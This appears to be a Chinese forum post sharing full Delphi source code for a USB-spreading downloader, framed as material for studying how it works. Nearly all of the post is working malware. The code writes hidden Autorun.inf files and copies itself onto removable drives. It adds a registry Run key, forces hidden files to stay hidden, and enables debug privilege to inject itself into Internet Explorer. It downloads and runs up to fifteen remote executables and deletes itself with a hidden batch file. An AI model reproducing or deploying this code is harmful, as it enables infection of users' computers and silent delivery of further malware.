设为首页收藏本站网站地图
开启辅助访问 切换到宽版

 找回密码
 立即注册
永久免费资源网»资源 免费资源 免费教程 一个含U盘感染的downloader代码。(delphi)
返回列表 发新帖
查看: 1621|回复: 0

一个含U盘感染的downloader代码。(delphi)

[复制链接]
mianfeiziyuan

6782

主题

8

回帖

2万

积分

管理员

积分
21779
发表于 2019-5-20 21:43:29 | 显示全部楼层 |阅读模式
一个含U盘感染的downloader代码。可以作为原理进行分析。(delphi)
program AutoDown;
{$R  'ICON32.RES'  'ICON32.TXT' }
{$IMAGEBASE $17140000}
uses
Windows, SysUtils, wininet, mmsystem, messages;

var
htimer: integer;
msg: tmsg;
dw: bool;
url1: pchar =
('http://www.xxx.com/xx.exe');
url2: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url3: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url4: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url5: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url6: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url7: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url8: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url9: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url10: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url11: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url12: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url13: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url14: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url15: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');

Downfile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved:
   LongWord; StatusCB: pointer): Longint; stdcall;
hShell, hUrlmon: THandle;

ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directory:
   PChar; ShowCmd: Integer): Cardinal; stdcall;

procedure RunInject(InjType: integer); stdcall; forward;
const
ExeName = 'system.exe';
faReadOnly = $00000001;
faHidden = $00000002;
faSysFile = $00000004;
faVolumeID = $00000008;
faDirectory = $00000010;
faArchive = $00000020;
faAnyFile = $0000003F;
Lyint: array[0..9] of Char = ('0', '1', '2', '3', '4', '5', '6', '7', '8',
   '9');
Lychr: array[0..25] of Char = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
   'j',
   'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
   'u', 'v', 'w', 'x', 'y', 'z');

var
i, Len, infsize: integer;
exefile, OpenPath, DriverList, TempFile: string;
NoDel: integer;
sa1, sa2, MyCursor: THandle;

type
TFileName = type string;
TSearchRec = record
   Time: Integer;
   Size: Integer;
   Attr: Integer;
   Name: TFileName;
   ExcludeAttr: Integer;
   FindHandle: THandle platform;
   FindData: TWin32FindData platform;
end;

LongRec = packed record
   case Integer of
     0: (Lo, Hi: Word);
     1: (Words: array[0..1] of Word);
     2: (Bytes: array[0..3] of Byte);
end;

{$R *.RES}

function FileExists(const FileName: string): Boolean;
var
Handle: THandle;
FindData: TWin32FindData;
begin
Handle := FindFirstFileA(PChar(FileName), FindData);
result := Handle <> INVALID_HANDLE_VALUE;
if result then
begin
   CloseHandle(Handle);
end;
end;

function FindMatchingFile(var F: TSearchRec): Integer;
var
LocalFileTime: TFileTime;
begin
with F do
begin
   while FindData.dwFileAttributes and ExcludeAttr <> 0 do
     if not FindNextFile(FindHandle, FindData) then
     begin
       Result := GetLastError;
       Exit;
     end;
   FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
   FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi,
     LongRec(Time).Lo);
   Size := FindData.nFileSizeLow;
   Attr := FindData.dwFileAttributes;
   Name := FindData.cFileName;
end;
Result := 0;
end;

procedure FindClose(var F: TSearchRec);
begin
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
   Windows.FindClose(F.FindHandle);
   F.FindHandle := INVALID_HANDLE_VALUE;
end;
end;

function FindFirst(const Path: string; Attr: Integer;
var
F: TSearchRec): Integer;
const
faSpecial = faHidden or faSysFile or faVolumeID or faDirectory;
begin
F.ExcludeAttr := not Attr and faSpecial;
F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
   Result := FindMatchingFile(F);
   if Result <> 0 then FindClose(F);
end
else
   Result := GetLastError;
end;

function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
Result := 0;
if not SetFileAttributes(PChar(FileName), Attr) then
   Result := GetLastError;
end;

function deletefile(const FileName: string): Integer;
begin
Result := GetFileAttributes(PChar(FileName));
end;



function GetDirectory(dInt: integer): string;
var
s: array[0..255] of Char;
begin
case dInt of
   0: GetWindowsDirectory(@s, 256); //Windows安装文件夾所存在的路径
   1: GetSystemDirectory(@s, 256); //系统文件夾所存在的路径
   2: GetTempPath(256, @s); //Temp文件夾所存在的路径
end;
if dInt = 2 then
   result := string(s)
else
   result := string(s) + '';
end;

function ExtractFilePath(FileName: string): string;
begin
Result := '';
while ((Pos('', FileName) <> 0) or (Pos('/', FileName) <> 0)) do
begin
   Result := Result + Copy(FileName, 1, 1);
   Delete(FileName, 1, 1);
end;
end;

function ExtractFileName(FileName: string): string;
begin
while Pos('', FileName) <> 0 do
   Delete(FileName, 1, Pos('', FileName));
while Pos('/', FileName) <> 0 do
   Delete(FileName, 1, Pos('/', FileName));
Result := FileName;
end;

function SetRegValue(key: Hkey; subkey, name, value: string): boolean;
var
regkey: hkey;
begin
result := false;
RegCreateKey(key, PChar(subkey), regkey);
if RegSetValueEx(regkey, Pchar(name), 0, REG_EXPAND_SZ, pchar(value),
   length(value)) = 0 then
   result := true;
RegCloseKey(regkey);
end;

function CompareText(const S1, S2: string): Integer; assembler;
asm
       PUSH    ESI
       PUSH    EDI
       PUSH    EBX
       MOV    ESI,EAX
       MOV    EDI,EDX
       OR      EAX,EAX
       JE      @@0
       MOV    EAX,[EAX-4]
@@0:    OR      EDX,EDX
       JE      @@1
       MOV    EDX,[EDX-4]
@@1:    MOV    ECX,EAX
       CMP    ECX,EDX
       JBE    @@2
       MOV    ECX,EDX
@@2:    CMP    ECX,ECX
@@3:    REPE    CMPSB
       JE      @@6
       MOV    BL,BYTE PTR [ESI-1]
       CMP    BL,'a'
       JB      @@4
       CMP    BL,'z'
       JA      @@4
       SUB    BL,20H
@@4:    MOV    BH,BYTE PTR [EDI-1]
       CMP    BH,'a'
       JB      @@5
       CMP    BH,'z'
       JA      @@5
       SUB    BH,20H
@@5:    CMP    BL,BH
       JE      @@3
       MOVZX  EAX,BL
       MOVZX  EDX,BH
@@6:    SUB    EAX,EDX
       POP    EBX
       POP    EDI
       POP    ESI
end;

procedure DelMe;
var
BatchFile: TextFile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
BatchFileName := ExtractFilePath(GetDirectory(2)) + '~Lying.bAt';
AssignFile(BatchFile, BatchFileName);
Rewrite(BatchFile);
Writeln(BatchFile, ':tRy');
Writeln(BatchFile, 'DeL "' + ParamStr(0) + '" /a');
Writeln(BatchFile, 'iF eXiSt "' + ParamStr(0) + '"' + ' gOtO tRy');
Writeln(BatchFile, 'dEl %0 /A');
CloseFile(BatchFile);
SetFileAttributes(pchar(BatchFileName), FILE_ATTRIBUTE_HIDDEN +
   FILE_ATTRIBUTE_SYSTEM);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil,
   False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo,
   ProcessInfo) then
begin
   CloseHandle(ProcessInfo.hThread);
   CloseHandle(ProcessInfo.hProcess);
end;
end;

function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 1 to 25 do //遍历26个字母
begin
   D := Chr(i + 65);
   Str := D + ':';
   DiskType := GetDriveType(PChar(Str)); //得到本地磁盘,网络磁盘和移动磁盘...
   if {(DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) or} (DiskType =
     DRIVE_REMOVABLE) then
     Result := Result + D;
end;
end;

function SendMetoDriver(const DriveName: string): Boolean;
var
InfFile, Mmfile: string;
InfText: TextFile;
begin
InfFile := DriveName + 'Autorun.inf';
MmFile := DriveName + ExeName;
if (not FileExists(InfFile))  then
begin
   AssignFile(InfText, InfFile);
   try
     ReWrite(InfText);
     WriteLn(InfText, '[AutoRun]');
     WriteLn(InfText, 'open=' + ExeName);
     WriteLn(InfText, 'shellexecute=' + ExeName);
     WriteLn(InfText, 'shellAutocommand=' + ExeName);
   finally
     CloseFile(InfText);
   end;
   SetFileAttributes(pchar(inffile), FILE_ATTRIBUTE_HIDDEN +
     FILE_ATTRIBUTE_SYSTEM);
end;
if (not FileExists(MmFile))  then
begin
   CopyFile(pchar(ParamStr(0)), pchar(MmFile), false);
   SetFileAttributes(pchar(MmFile), FILE_ATTRIBUTE_HIDDEN +
     FILE_ATTRIBUTE_SYSTEM);
end;
end;

function IsFileInUse(fName: string): boolean;
var
HFileRes: HFILE;
begin
Result := false;
if not FileExists(fName) then
   exit;
HFileRes := CreateFile(pchar(fName), GENERIC_READ or GENERIC_WRITE,
   0 {this is the trick!}, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
Result := (HFileRes = INVALID_HANDLE_VALUE);
if not Result then
   CloseHandle(HFileRes);
end;
procedure dir;
begin
if not directoryexists(pchar('Crogram FilesWindowsUpdate')) then
try
   createdir(pchar('Crogram FilesWindowsUpdate'));
except
end;
       end;
procedure regme;
begin
SetRegValue(HKEY_LOCAL_MACHINE,
   'SoftWareMicrosoftWindowsCurrentVersionpoliciesExplorerRun', 'Lying', exefile); //自启动
SetRegValue(HKEY_LOCAL_MACHINE,
   'SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL',
   'CheckedValue', '2'); //强制隐藏系统文件
end;

procedure infect();
var
i, len: integer;
driverlist: string;
begin
DriverList := GetDrives;
Len := Length(DriverList);
for i := Len downto 1 do
   SendMetoDriver(DriverList[i] + ':');
end;

function GetOnlineStatus: Boolean;
var
ConTypes: Integer;
begin
ConTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN +
   INTERNET_CONNECTION_PROXY;
if (InternetGetConnectedState(@ConTypes, 0) = False) then
   Result := False
else
   Result := True;
end;
procedure GetDebugPrivs; //提升进程权限
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword;
begin
if (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or
   TOKEN_QUERY, hToken)) then
begin
   LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid);
   tkp.PrivilegeCount := 1;
   tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
   AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end;
procedure TimerProc(uID, uMsg, dwUser, dw1, dw2: DWORD); stdcall;
//网络连接时启动各种功能和下载
begin
try
infect;
except
end;
if GetOnlineStatus and not dw then
begin
   try
   GetDebugPrivs;
     RunInject(1); //1 注入iexplore.exe
   except
   end;
   dw := true;
end;

//timeKillEvent(hTimer3);
end;

procedure infecttimer; stdcall;
begin
//Messagebox(0,pchar(time1+' '+hostbc+' '+urlbc),'数据', MB_OK);
hTimer := TimeSetEvent(6000, 0, TimerProc, 0, TIME_PERIODIC);
while (GetMessage(Msg, 0, 0, 0)) do
   ;
end;

procedure AutoAndw0rM;
var
tid: dword;
begin
dw := false;
if pos('pagefile.pif', pchar(paramstr(0))) > 0 then exitprocess(0);
CreateMutex(nil, TRUE, 'dx'); //TRUE 标明该进程拥有此 Mutex 对象
if (GetLastError = ERROR_ALREADY_EXISTS) then exit; //Mutex 对象是否存在
dir;
regme;  //加载注册表
CreateThread(nil, 0, @infecttimer, nil, 0, TID);
while (GetMessage(Msg, 0, 0, 0)) do
   ;
end;

procedure Download; //下载过程

begin
// dw := true; //下载了一次
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell := LoadLibrary('Shell32.dll');
hUrlmon := LoadLibrary('urlmon.dll');
@ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
@Downfile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');

{if not directoryexists(pchar('Crogram FilesWindowsUpdate')) then
try
   createdir(pchar('Crogram FilesWindowsUpdate'));
except
end;  }
try
Downfile(nil,pchar(url1),'Crogram FilesWindowsUpdate1.exe', 0, nil);
ShellRun(0,'open','Crogram FilesWindowsUpdate1.exe',nil,nil,5);
except
end;

{Downfile(nil, pchar('http://www.mybr.org/test/a.exe'),
   'Crogram FilesWindowsUpdate1.exe', 0, nil);
ShellRun(0, 'open', 'Crogram FilesWindowsUpdate1.exe', nil, nil, 5);
}
try
   Downfile(nil, pchar(url2), 'Crogram FilesWindowsUpdate2.exe', 0, nil);
   ShellRun(0, 'open', 'Crogram FilesWindowsUpdate2.exe', nil, nil, 5);
except
end;

try
   Downfile(nil, pchar(url3), 'C:Program FilesWindowsUpdate3.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate3.exe', nil, nil, 5);
except
end;

try
   Downfile(nil, pchar(url4), 'C:Program FilesWindowsUpdate4.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate4.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url5), 'C:Program FilesWindowsUpdate5.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate5.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url6), 'C:Program FilesWindowsUpdate6.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate6.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url7), 'C:Program FilesWindowsUpdate7.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate7.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url8), 'C:Program FilesWindowsUpdate8.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate8.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url9), 'C:Program FilesWindowsUpdate9.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate9.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url10), 'C:Program FilesWindowsUpdate10.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate10.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url11), 'C:Program FilesWindowsUpdate11.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate11.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url12), 'C:Program FilesWindowsUpdate12.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate12.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url13), 'C:Program FilesWindowsUpdate13.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate13.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url14), 'C:Program FilesWindowsUpdate14.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate14.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url15), 'C:Program FilesWindowsUpdate15.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate15.exe', nil, nil, 5);
except
end;
//ExitProcess(0);
end;

procedure Inject(ProcessHandle: longword; EntryPoint: pointer); //注入
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) +
   PImageDosHeader(Module)._lfanew +
   SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or
   MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

procedure setme;
begin
if (CompareText(ParamStr(0), Copy(ParamStr(0), 1, 3) + ExeName) = 0) and
   (CompareText(ExtractFileName(ParamStr(0)), exename) = 0) then
begin
   sa1 := Findwindow('CabinetWClass', nil); //我的电脑
   if GetForegroundwindow <> sa1 then exit;
   sa1 := findwindowex(sa1, 0, 'WorkerW', nil);
   sa1 := findwindowex(sa1, 0, 'ReBarWindow32', nil);
   sa1 := findwindowex(sa1, 0, 'ComboBoxEx32', nil);
   sa2 := findwindowex(sa1, 0, 'ToolbarWindow32', nil);
   sa1 := findwindowex(sa1, 0, 'ComboBox', nil);
   sa1 := findwindowex(sa1, 0, 'Edit', nil);
   OpenPath := Copy(ParamStr(0), 1, 3);
   SendMessage(sa1, WM_SETTEXT, length(OpenPath), longint(pchar(OpenPath)));
   SendMessage(sa2, WM_LBUTTONDOWN, 0, 0);
   SendMessage(sa2, WM_LBUTTONUP, 0, 0);
   SendMessage(sa1, WM_KILLFOCUS, 0, 0); //去掉焦点,避免怀疑...
   NoDel := 1;
end;
if IsFileInUse(exefile) = false then
begin
   SetFileAttributes(pchar(exefile), 0);
   DeleteFile(pchar(exefile));
   Copyfile(pchar(ParamStr(0)), pchar(exefile), false);
   SetFileAttributes(pchar(exefile), FILE_ATTRIBUTE_HIDDEN +
     FILE_ATTRIBUTE_SYSTEM);
   winexec(pchar(exefile), sw_hide);
end;
//AutoAndw0rM;
if (NoDel <> 1) then DelMe; //如果nodel这个变量<>1,就自删除
ExitProcess(0);
end;

procedure RunInject(InjType: integer);
var
ProcessHandle, PID: longword;

begin
if InjType = 0 then //注入explorer.exe
begin
   //获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
   GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else //注入iexplore.exe
begin
   //createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
   winexec(PChar('C:Program FilesInternet ExplorerIEXPLORE.EXE'), sw_hide);
   sleep(500);
   GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
   //打开进程
   ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
   Inject(ProcessHandle, @Download);
   //关闭对像
   CloseHandle(ProcessHandle);
   //sleep(500);
   //ExtDelMe;
end;
end;

begin
exefile := Pchar(GetDirectory(2) + ExeName);
if CompareText(ParamStr(0), exefile) <> 0 then
   setme
else
begin
   AutoAndw0rM;
// ExitProcess(0);
end;
end.
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表